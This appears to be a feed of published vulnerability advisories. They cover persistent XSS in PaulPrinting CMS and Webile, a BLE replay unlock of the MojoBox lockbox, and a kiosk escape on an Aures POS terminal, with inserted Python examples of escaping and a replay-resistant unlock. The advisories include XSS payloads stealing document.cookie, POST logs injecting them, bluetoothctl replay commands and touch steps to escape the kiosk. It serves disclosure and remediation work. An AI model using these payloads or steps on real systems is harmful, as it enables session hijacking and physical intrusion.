<pre><code>Document Title:<br />===============<br />PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2285<br /><br /><br />Release Date:<br />=============<br />2023-07-19<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2285<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.8<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />PaulPrinting is designed to be feature rich, easy to use and search engine friendly, with a modern design and a visually appealing interface.<br /><br />(Copy of the Homepage: https://codecanyon.net/user/codepaul )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The Vulnerability Laboratory core research team discovered multiple persistent cross site scripting vulnerabilities in the PaulPrinting (v2018) CMS web-application.<br /><br /><br />Affected Product(s):<br />====================<br />CodePaul<br />Product: PaulPrinting (2018) - CMS (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-08-25: Researcher Notification & Coordination (Security Researcher)<br />2022-08-26: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2023-07-19: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple persistent input validation vulnerabilities have been discovered in the official PaulPrinting (v2018) CMS web-application.<br />The vulnerabilities allow remote attackers to inject their own malicious script code with a persistent attack vector to compromise<br />browser-to-web-application requests from the application side.<br /><br />The first vulnerability is located in the register module. Remote attackers are able to register a user account with malicious script code<br />in the profile fields. After registration, the malformed script executes when the user reviews the settings or when administrators review<br />the user in the backend (listing).<br /><br />The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject their own<br />malicious script code into the contact details of a delivery address. The code then executes on each interaction with the address by users<br />or when administrators review it in the backend (listing).<br /><br />Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to<br />malicious sources and persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] /printing/register<br />[+] /account/delivery<br /><br />Vulnerable Input(s):<br />[+] First name<br />[+] Last name<br />[+] Address<br />[+] City<br />[+] State<br /><br />Vulnerable Parameter(s):<br />[+] firstname<br />[+] lastname<br />[+] address<br />[+] city<br />[+] state<br /><br />Affected Module(s):<br />[+] Frontend Settings (./printing/account/setting)<br />[+] Frontend Delivery Address (./printing/account/delivery)<br />[+] Backend User Preview Listing<br />[+] Backend Delivery Address Contact Review<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent input validation web vulnerabilities can be exploited by remote attackers with a low privileged user account and low user interaction.<br />For security demonstration or to reproduce the vulnerability, follow the information and steps below.<br /><br /><br />Manual steps to reproduce the vulnerability ...<br />1. Open your browser and start an HTTP session tamper (intercepting proxy)<br />2. Register in the application by clicking the register link on the login page<br />3. Inject your test payload into the marked vulnerable input fields<br />4. Save the entry by submitting it via the POST method<br />5. Log in to the account and preview the settings<br />Note: Administrators in the backend see the same incorrectly validated content, which executes on preview of the user<br />6. The script code executes on preview of the profile settings<br />7. Successful reproduction of the first vulnerability!<br />8. Follow up by opening the delivery address module<br />9. Add a contact and insert your test payload into the same marked vulnerable input fields<br />Note: The script code executes on each review of the address in the backend or the user frontend<br />10. Successful reproduction of the second vulnerability!<br /><br /><br />Exploitation: Payload<br />"<iframe src=evil.source onload(alert(document.cookie)><br />"<iframe src=evil.source onload(alert(document.domain)><br /><br /><br />--- PoC Session Logs (POST) ---<br />https://paulprinting.localhost:8000/printing/account/setting<br />Host: paulprinting.localhost:8000<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 357<br />Origin: https://paulprinting.localhost:8000<br />Connection: keep-alive<br />Referer: https://paulprinting.localhost:8000/printing/account/setting<br />Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;<br />POST:<br />title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>><br />&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>><br />&address=c"<iframe src=evil.source onload(alert(document.cookie)>><br />&city=d"<iframe src=evil.source onload(alert(document.cookie)>><br />&state=e"<iframe src=evil.source onload(alert(document.cookie)>><br />&zipcode=2342&country=BS&phone=23523515235235&save=Save<br />-<br />POST: HTTP/3.0 302 Found<br />content-type: text/html; charset=UTF-8<br />x-powered-by: PHP/7.1.33<br />location: https://paulprinting.localhost:8000/printing/account/setting?save=1<br />-<br />https://paulprinting.localhost:8000/printing/account/setting?save=1<br />Host: paulprinting.localhost:8000<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Referer: https://paulprinting.localhost:8000/printing/account/setting<br />Connection: keep-alive<br />Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;<br />-<br />POST: HTTP/3.0 200 OK<br />content-type: text/html; charset=UTF-8<br />x-powered-by: PHP/7.1.33<br /><br /><br />Vulnerable Source: Your Account - Settings<br /><div class="form-group row"><br /><label class="col-sm-4 col-form-label">First name</label><br /><div class="col-sm-8"><br /><input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>"><br /></div></div><br /><label class="col-sm-4 col-form-label">Last name</label><br /><div class="col-sm-8"><br /><input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>"><br /></div></div><br /><div class="form-group row"><br /><label class="col-sm-4 col-form-label">Address</label><br /><div class="col-sm-8"><br /><input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>"><br /></div></div><br /><div class="form-group row"><br /><label class="col-sm-4 col-form-label">City</label><br /><div class="col-sm-8"><br /><input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>"><br /></div></div><br /><div class="form-group row"><br /><label class="col-sm-4 col-form-label">State</label><br /><div class="col-sm-8"><br /><input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>"><br /></div></div><br /><br /><br />Vulnerable Source: Delivery Contact (Address)<br /><table class="table"><br /><thead><br /><tr><br /><th>Contact</th><br /><th>Address</th><br /><th>City</th><br /><th>State</th><br /><th>Country</th><br /><th></th><br /></tr><br /></thead><br /><tbody><tr><br /><td>a"<iframe src=evil.source onload(alert(document.cookie)></td><br /><td>b"<iframe src=evil.source onload(alert(document.cookie)></td><br /><td>c"<iframe src=evil.source onload(alert(document.cookie)></td><br /><td>d"<iframe src=evil.source onload(alert(document.cookie)></td><br /><td></td><br /><td class="text-right"><br /><a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>|<br /><a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a><br /></td></tr></tbody><br /></table><br /><br /><br />Security Risk:<br />==============<br />The security risk of the cross site scripting web vulnerabilities with persistent attack vector is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to ask for permission.<br /><br /> Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
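<p>Added example (not PaulPrinting code): a Python stand-in for the two templates quoted in the advisory above, the settings form (value="..." attribute context) and the delivery contact listing (td text context), each rendered once without escaping and once with output encoding, using the advisory's own payload. The template strings, the helper names and the FIELDS tuple are assumptions for the demonstration.</p>

```python
"""Added example (not PaulPrinting code): a stand-in for the two templates
quoted in the advisory, the settings form (value="..." attribute context)
and the delivery-address listing (<td> text context), rendered raw and then
with output encoding. The stored value is the advisory's own payload; it
carries a double quote that closes the attribute early and angle brackets
that open a new tag. html.escape(quote=True) neutralises both."""
import html
import re

# Payload quoted from the advisory's PoC form submission.
PAYLOAD = 'a"<iframe src=evil.source onload(alert(document.cookie)>'
# Profile fields the advisory lists as vulnerable.
FIELDS = ("firstname", "lastname", "address", "city", "state")


def render_input_vulnerable(name: str, value: str) -> str:
    """Unescaped echo into a double-quoted attribute, as in the settings form."""
    return f'<input type="text" name="{name}" class="form-control" value="{value}">'


def render_input_hardened(name: str, value: str) -> str:
    """Same template with attribute-context escaping: " becomes &quot; and
    < becomes &lt;, so the attribute cannot be closed and no tag can start."""
    return (f'<input type="text" name="{html.escape(name, quote=True)}" '
            f'class="form-control" value="{html.escape(value, quote=True)}">')


def render_cell_vulnerable(value: str) -> str:
    """Unescaped echo into a table cell, as in the delivery contact listing."""
    return f"<td>{value}</td>"


def render_cell_hardened(value: str) -> str:
    """Text-node context: escaping < and > is what blocks tag injection here."""
    return f"<td>{html.escape(value, quote=True)}</td>"


def render_settings_form(profile: dict, hardened: bool = True) -> str:
    """Render all five profile inputs with one or the other template."""
    render = render_input_hardened if hardened else render_input_vulnerable
    return "\n".join(render(field, profile.get(field, "")) for field in FIELDS)


_TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][a-zA-Z0-9-]*")


def count_tags(markup: str) -> int:
    """Number of tag openers in rendered markup; an extra one means a breakout."""
    return len(_TAG_RE.findall(markup))


def attribute_value(markup: str) -> str:
    """What a browser would take as the value="..." content, entities decoded."""
    match = re.search(r'value="([^"]*)"', markup)
    return html.unescape(match.group(1)) if match else ""
```

The same escaping has to be applied wherever the stored fields are echoed, including the backend user and address listings the advisory names, since the payload is persisted once and rendered in several places.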
<pre><code># Exploit Title: MojoBox v1.4 BLE replay attack<br /># Exploit Author: Matteo Mandolini<br /># Date: 15/03/2023<br /># Vendor Homepage: https://hello.showmojo.com/mojobox/<br /># Version: <1.4<br /># CVE: CVE-2023-34625<br /><br />BLE Replay Attack<br /><br />ShowMojo MojoBox Digital Lockbox with firmware versions prior to 1.4 is vulnerable to authentication bypass. The implementation of the lock<br />opening mechanism via Bluetooth Low Energy (BLE) is vulnerable to replay attacks.<br /><br />PoC (bluetoothctl session):<br />[MojoBox-023516]# gatt.select-attribute ff02<br />[MojoBox-023516:/service000c/char000f]# gatt.notify on<br />[CHG] Attribute /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000f Notifying: yes<br />Notify started<br />[MojoBox-023516:/service000c/char000d]# gatt.write "0x68 0x01 0x18 0x28 0xFC 0x08 0xE5 0xB9 0xDA 0xDB 0xCE 0x21 0x62 0x1B 0x2A 0xF9 0xBE 0xFB 0x1E 0xE9"<br />Attempting to write /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000d<br />[MojoBox-023516:/service000c/char000d]# gatt.write "0xA0 0x13 0xEE 0x11 0x94 0x31 0x7D 0xDB 0x16"<br />Attempting to write /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000d<br /></code></pre>
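<p>Added example, not ShowMojo's firmware or app code: a Python model of a challenge-response unlock in which writing a captured BLE frame a second time fails. The fixed byte strings replayed above work because the lock accepts them as-is; here the lock hands out a fresh nonce (the value it would push over the notify characteristic) and opens only for an HMAC bound to that nonce and the command, once. The key, command byte, nonce length and frame layout are assumptions for the demonstration.</p>

```python
"""Added example, not ShowMojo's firmware or app code: a challenge-response
unlock in which replaying a captured BLE write fails. The replayed gatt.write
frames in the PoC work because the lock accepts a fixed byte string; here the
lock hands out a fresh nonce (over the notify characteristic) and accepts
only an HMAC bound to that nonce and the command, once. Key, command byte,
nonce length and frame layout are assumptions for the demonstration."""
from __future__ import annotations

import hashlib
import hmac
import secrets

CMD_UNLOCK = 0x01   # assumed command byte
NONCE_LEN = 8       # assumed nonce size
TAG_LEN = 16        # truncated HMAC-SHA256 tag


class Lock:
    """Lock side. A real lock would also expire pending nonces and rate-limit."""

    def __init__(self, key: bytes) -> None:
        self._key = key
        self._pending: set[bytes] = set()   # nonces issued but not yet used
        self.opened = 0

    def challenge(self) -> bytes:
        """Sent to the phone via notify: a fresh random nonce."""
        nonce = secrets.token_bytes(NONCE_LEN)
        self._pending.add(nonce)
        return nonce

    def write(self, frame: bytes) -> bool:
        """Handles one write of nonce || cmd || tag. Returns True if opened."""
        if len(frame) != NONCE_LEN + 1 + TAG_LEN:
            return False
        nonce, cmd, tag = frame[:NONCE_LEN], frame[NONCE_LEN], frame[NONCE_LEN + 1:]
        if nonce not in self._pending:           # never issued or already consumed
            return False
        expected = hmac.new(self._key, nonce + bytes([cmd]), hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):
            return False                          # wrong key: nonce stays pending
        self._pending.discard(nonce)              # single use: a replay fails the check above
        if cmd == CMD_UNLOCK:
            self.opened += 1
            return True
        return False


def build_unlock_frame(key: bytes, nonce: bytes) -> bytes:
    """Phone side: answer the lock's challenge with an authenticated unlock."""
    tag = hmac.new(key, nonce + bytes([CMD_UNLOCK]), hashlib.sha256).digest()[:TAG_LEN]
    return nonce + bytes([CMD_UNLOCK]) + tag


def demo() -> tuple[bool, bool]:
    """A legitimate unlock succeeds; writing the identical frame again does not."""
    key = bytes.fromhex("00112233445566778899aabbccddeeff")   # constructed test key
    lock = Lock(key)
    frame = build_unlock_frame(key, lock.challenge())
    first = lock.write(frame)
    replay = lock.write(frame)
    return first, replay
```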
<pre><code>Document Title:<br />===============<br />Aures Booking & POS Terminal - Local Privilege Escalation<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2323<br /><br /><br />Release Date:<br />=============<br />2023-07-17<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2323<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />7.2<br /><br /><br />Vulnerability Class:<br />====================<br />Privilege Escalation<br /><br /><br />Current Estimated Price:<br />========================<br />3.000€ - 4.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />KOMET is an interactive, multifunctional kiosk specially designed for the fast food industry. Available as a wall-mounted or<br />freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk<br />features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner.<br />With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to<br />manage customer cards and promotions. Queue management can also be optimized.<br /><br />(Copy of the Homepage: https://aures.com/de/komet/ )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The Vulnerability Laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of<br />the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the German company immergrün franchise GmbH.<br /><br /><br />Affected Product(s):<br />====================<br />Aures Technologies GmbH<br />Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2023-05-09: Researcher Notification & Coordination (Security Researcher)<br />2023-07-17: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Local<br /><br /><br />Severity Level:<br />===============<br />High<br /><br /><br />Authentication Type:<br />====================<br />Open Authentication (Anonymous Privileges)<br /><br /><br />User Interaction:<br />=================<br />No User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A kiosk mode escape (privilege escalation) vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal<br />(Windows 10 IoT Enterprise) used by the German company immergrün franchise GmbH. The security vulnerability allows local attackers<br />to bypass the kiosk mode and compromise the local file system and applications.<br /><br />It is possible for local attackers to escape the kiosk mode of the Aures Komet Booking & POS Terminal. Local attackers are<br />able to use the touch functionality of the terminal to escalate to higher privileges. The security vulnerability is located in the<br />context menu function of the extended menu on touch interaction. Attackers with restricted, low privileged local access to the booking<br />service front display are able to execute files, download content without restriction, or exfiltrate local file-system information<br />from the compromised Windows-based operating system.<br /><br />No keyboard or other connections are required to manipulate the service booking and payment terminal. The vulnerability requires no<br />user interaction to be exploited and can only be triggered with local physical device access.<br /><br />Vulnerable Operating System(s):<br />[+] Windows 10 (IoT Enterprise)<br /><br />Affected Component(s):<br />[+] Context Menu<br /><br />Affected Function(s):<br />[+] Web Search<br />[+] Share (Teilen)<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The local vulnerability can be exploited by local attackers with physical device access and without user interaction.<br />For security demonstration or to reproduce the vulnerability, follow the information and steps below.<br /><br /><br />PoC: Sheet<br />Touch Display => Select Food Item => Highlight Text<br />=> Open Context Menu => Extend Context Menu => Web-Search<br />=> Browser => Local File System => Compromised!<br /><br /><br />Manual steps to reproduce the vulnerability ...<br />01. First touch the monitor display to wake it from standby<br />02. Select a food item from the immergrün menu (we recommend the Caesar wraps)<br />03. Push the information button of the selected food item<br />04. Tap twice to mark the text of the selected food item<br />05. Press a third time, holding down on the touch display, after the text has been marked<br />06. The operating system's context menu for highlighted text now appears<br />07. Tap the three dots in the context menu to extend the visible function menu<br />08. Select the web-search or share function for the highlighted content in the context menu<br />09. The browser of the operating system opens on the main front screen<br />10.1 Files can now be downloaded and executed using the browser without any blacklisting (Unrestricted Web Access - Download of Files)<br />10.2 Attackers can open websites on the front display to manipulate the visible content (Scam & Spam - Web Messages & Web Context)<br />10.3 Attackers are able to manipulate the web content displayed by immergrün via the browser debugger (Phishing - Form & Banking Information)<br />10.4 Attackers are able to access the local file system and compromise it by reconfiguration with a privileged user account (Local File-System - Privilege Escalation)<br />10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.)<br />10.6 Attackers are able to exfiltrate data from the local computer system using the web connection and available protocols<br />10.7 Attackers are able to perform man in the middle attacks from the local computer system<br />11.0 Successful reproduction of the security vulnerability!<br /><br /><br />Reference(s): Pictures<br />- 1.png (Terminal A)<br />- 2.png (Terminal B)<br />- 3.png (Escape)<br />- 4.png (Awareness)<br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The security vulnerability can be patched with the following steps:<br />1. Disable the extension of the context menu<br />2. Disable the context menu<br />3. Disable web-search<br />4. Disable the marking of text inputs & texts<br />5. Disallow opening websites that are not whitelisted<br />6. Disable file downloads<br />7. Restrict web-browser access<br />8. Disallow the file browser<br />9. Disable the browser debug mode<br />10. Reconfigure the local firewall to explicitly allow and deny connections<br />11. Change the access permissions to prevent exfiltration<br /><br /><br />Security Risk:<br />==============<br />The security risk of the vulnerability in the local booking and payment terminal system is considered high.<br />The issue can be easily exploited by local attackers with simple interaction via the touch display.<br />Once compromised, attackers can fully manipulate the computer's operating system and misuse it for<br />further simple or more complex attack scenarios.<br /><br /><br />Credits & Authors:<br />==================<br />Benjamin Mejri (Kunz) - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.<br />Lars Guenther - https://www.vulnerability-lab.com/show.php?user=L.+Guenther<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Webile v1.0.1 - Multiple Cross Site Web Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2321<br /><br /><br />Release Date:<br />=============<br />2023-07-03<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2321<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.5<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in<br />the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,<br />statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other<br />functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. 
Support Mac,<br />Windows, Linux, iOS, Android and other multi-platform operating systems.<br /><br />(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.<br /><br />Affected Product(s):<br />====================<br />Product Owner: Webile<br />Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-10-11: Researcher Notification & Coordination (Security Researcher)<br />2022-10-12: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2023-07-03: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Guest Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application.<br />The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to<br />web-application requests from the 
application-side.<br /><br />The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious<br />script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious<br />source and persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Parameter(s):<br />[+] new_file_name<br />[+] i<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.<br />For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Vulnerable Source: Send<br />Send message to phone listing<br /><div class="layui-colla-item"><br /><div class="layui-card-header">Message</div><br /><div class="layui-colla-content" style="display:block;padding-left:16px;"><br /><div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;" <br />title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br><br /><span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div><br /></div></div></div><br />history logs messages<br /><table class="layui-table layui-form"><br /><thead><tr><br /><th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"><br /><input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" 
lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th><br /><th style="border-right-width:1px;">Message</th><br /><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th><br /><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr><br /></thead><br /><tbody><tr><br /><td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"><br /><input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div><br /></td><br /><td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td><br /><td align="center">2022/07/17 20:10</td><br /><td class="td-manage" style="border-right-width:1px;text-align:center;"><br /><a title="Copy" onclick="copy(3)" href="javascript:;"><br /><i class="iconfont">&nbsp;&nbsp;</i><br /></a><br /><a title="Delete" onclick="deleteLog(this,3)" href="javascript:;"><br /><i class="layui-icon">&nbsp;&nbsp;</i><br /></a></td></tr></tbody></table><br /><br /><br /><br />--- PoC Session Logs #1 (POST) --- (Add)<br />http://localhost:8080/file_action<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 210<br />Origin:http://localhost:8080<br />Connection: keep-alive<br />Referer:http://localhost:8080/webile_files<br />Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6<br 
/>i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}<br />-<br />POST: HTTP/1.1 200 OK<br />Content-Type: application/json<br />Connection: keep-alive<br />Content-Encoding: gzip<br />Transfer-Encoding: chunked<br />-<br />http://localhost:8080/evil.source<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Referer:http://localhost:8080/webile_files<br />Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6<br />Upgrade-Insecure-Requests: 1<br />-<br />GET: HTTP/1.1 200 OK<br />Content-Type: application/octet-stream<br />Connection: keep-alive<br />Content-Length: 0<br />-<br />Cookie:<br />treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6<br /><br /><br /><br />--- PoC Session Logs #2 (POST) --- (Send)<br />http://localhost:8080/send<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 180<br />Origin:http://localhost:8080<br />Connection: keep-alive<br />Referer:http://localhost:8080/webile_send<br />Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6<br />i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}<br />-<br />POST: HTTP/1.1 200 OK<br />Content-Type: application/json<br />Connection: keep-alive<br />Content-Encoding: gzip<br />Transfer-Encoding: chunked<br 
/>-<br />http://localhost:8080/evil.source<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Referer:http://localhost:8080/webile_send<br />Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6<br />Upgrade-Insecure-Requests: 1<br />-<br />GET: HTTP/1.1 200 OK<br />Content-Type: application/octet-stream<br />Date: Sun, 17 Jul 2022 18:08:33 GMT<br />Connection: keep-alive<br />Content-Length: 0<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. 
